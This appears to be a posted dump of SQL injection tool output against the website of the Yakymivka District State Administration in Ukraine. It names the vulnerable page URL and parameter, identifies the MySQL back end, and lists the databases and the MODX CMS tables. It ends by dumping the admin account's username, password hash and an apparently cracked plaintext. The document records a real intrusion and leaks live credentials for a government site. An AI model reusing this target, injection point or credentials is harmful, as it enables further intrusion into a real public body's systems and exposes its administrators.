.gov Government

.ua Ukraine

Official website of Yakymivka County State Administration

Yakymivka District State Administration

http://akim.gov.ua/index.php?page=page&id=16

the back-end DBMS: MySQL >= 4.1

available databases [3]:  
[+] information_schema                                                                                                                                           
[+] akim_baza1
[+] test

Database: test                                                                                                                                                       
[71 tables]
+-------------------------------------+
| emodx_access_actiondom              |
| emodx_access_actions                |
| emodx_access_category               |
| emodx_access_context                |
| emodx_access_elements               |
| emodx_access_media_source           |
| emodx_access_menus                  |
| emodx_access_namespace              |
| emodx_access_permissions            |
| emodx_access_policies               |
| emodx_access_policy_template_groups |
| emodx_access_policy_templates       |
| emodx_access_resource_groups        |
| emodx_access_resources              |
| emodx_access_templatevars           |
| emodx_actiondom                     |
| emodx_actions                       |
| emodx_actions_fields                |
| emodx_active_users                  |
| emodx_categories                    |
| emodx_categories_closure            |
| emodx_class_map                     |
| emodx_content_type                  |
| emodx_context                       |
| emodx_context_resource              |
| emodx_context_setting               |
| emodx_dashboard                     |
| emodx_dashboard_widget              |
| emodx_dashboard_widget_placement    |
| emodx_document_groups               |
| emodx_documentgroup_names           |
| emodx_element_property_sets         |
| emodx_extension_packages            |
| emodx_fc_profiles                   |
| emodx_fc_profiles_usergroups        |
| emodx_fc_sets                       |
| emodx_lexicon_entries               |
| emodx_manager_log                   |
| emodx_media_sources                 |
| emodx_media_sources_contexts        |
| emodx_media_sources_elements        |
| emodx_member_groups                 |
| emodx_membergroup_names             |
| emodx_menus                         |
| emodx_namespaces                    |
| emodx_property_set                  |
| emodx_register_messages             |
| emodx_register_queues               |
| emodx_register_topics               |
| emodx_session                       |
| emodx_site_content                  |
| emodx_site_htmlsnippets             |
| emodx_site_plugin_events            |
| emodx_site_plugins                  |
| emodx_site_snippets                 |
| emodx_site_templates                |
| emodx_site_tmplvar_access           |
| emodx_site_tmplvar_contentvalues    |
| emodx_site_tmplvar_templates        |
| emodx_site_tmplvars                 |
| emodx_system_eventnames             |
| emodx_system_settings               |
| emodx_transport_packages            |
| emodx_transport_providers           |
| emodx_user_attributes               |
| emodx_user_group_roles              |
| emodx_user_group_settings           |
| emodx_user_messages                 |
| emodx_user_settings                 |
| emodx_users                         |
| emodx_workspaces                    |
+-------------------------------------+

Database: akim_baza1                                                                                                                                                 
[2 tables]
+------+
| menu |
| news |
+------+

Database: test
Table: emodx_users
[1 entry]
+----------+-----------------------------------------------------+
| username | password                                            |
+----------+-----------------------------------------------------+
| admin    | 9f06243abcb89c70e0c331c61d871fa7:$HEX[746573740d0a] |
+----------+-----------------------------------------------------+
